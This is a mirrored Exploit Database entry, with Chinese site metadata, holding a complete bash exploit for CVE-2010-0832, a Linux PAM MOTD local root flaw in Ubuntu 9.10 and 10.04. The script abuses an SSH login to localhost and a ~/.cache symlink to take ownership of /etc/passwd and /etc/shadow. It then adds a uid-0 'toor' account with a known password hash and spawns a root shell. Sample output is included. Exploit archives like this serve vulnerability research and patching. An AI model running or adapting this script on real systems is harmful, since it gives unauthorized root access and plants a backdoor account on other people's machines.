Linux PAM 1.1.0 (Ubuntu 9.10/10.04) – MOTD File Tampering Privilege Escalation (2)

• Exploit Database
• 16 阅读

• 作者： anonymous
  日期： 2010-07-12
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/14339/

• #!/bin/bash
  #
  # Exploit Title: Ubuntu PAM MOTD local root
  # Date: July 9, 2010
  # Author: Anonymous
  # Software Link: http://packages.ubuntu.com/
  # Version: pam-1.1.0
  # Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
  # CVE: CVE-2010-0832
  # Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i
  # References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen
  #
  # Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.
  # Does not prompt for login by creating temporary SSH key and authorized_keys entry.
  #
  # user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh
  # [*] Ubuntu PAM MOTD local root
  # [*] Backuped /home/user/.ssh/authorized_keys
  # [*] SSH key set up
  # [*] Backuped /home/user/.cache
  # [*] spawn ssh
  # [+] owned: /etc/passwd
  # [*] spawn ssh
  # [+] owned: /etc/shadow
  # [*] Restored /home/user/.cache
  # [*] Restored /home/user/.ssh/authorized_keys
  # [*] SSH key removed
  # [+] Success! Use password toor to get root
  # Password:
  # root@ubuntu:/home/user# id
  # uid=0(root) gid=0(root) groupes=0(root)
  #
  P='toor:x:0:0:root:/root:/bin/bash'
  S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'
  echo "[*] Ubuntu PAM MOTD local root"
  [ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1
  [ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1
  [ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1
  backup() {
  [ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak
  [ -e "$1" ] || return 0
  mv "$1"{,.bak} || return 1
  echo "[*] Backuped $1"
  }
  restore() {
  [ -e "$1" ] && rm -rf "$1"
  [ -e "$1".bak ] || return 0
  mv "$1"{.bak,} || return 1
  echo "[*] Restored $1"
  }
  key_create() {
  backup ~/.ssh/authorized_keys
  ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1
  [ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; }
  mv "$KEY.pub" ~/.ssh/authorized_keys || return 1
  echo "[*] SSH key set up"
  }
  key_remove() {
  rm -f "$KEY"
  restore ~/.ssh/authorized_keys
  echo "[*] SSH key removed"
  }
  own() {
  [ -e ~/.cache ] && rm -rf ~/.cache
  ln -s "$1" ~/.cache || return 1
  echo "[*] spawn ssh"
  ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true
  [ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; }
  echo "[+] owned: $1"
  }
  bye() {
  key_remove
  exit 1
  }
  KEY="$(mktemp -u)"
  key_create || { echo "[-] Failed to setup SSH key"; exit 1; }
  backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; }
  own /etc/passwd && echo "$P" >> /etc/passwd
  own /etc/shadow && echo "$S" >> /etc/shadow
  restore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; }
  key_remove
  echo "[+] Success! Use password toor to get root"
  su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \
  chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor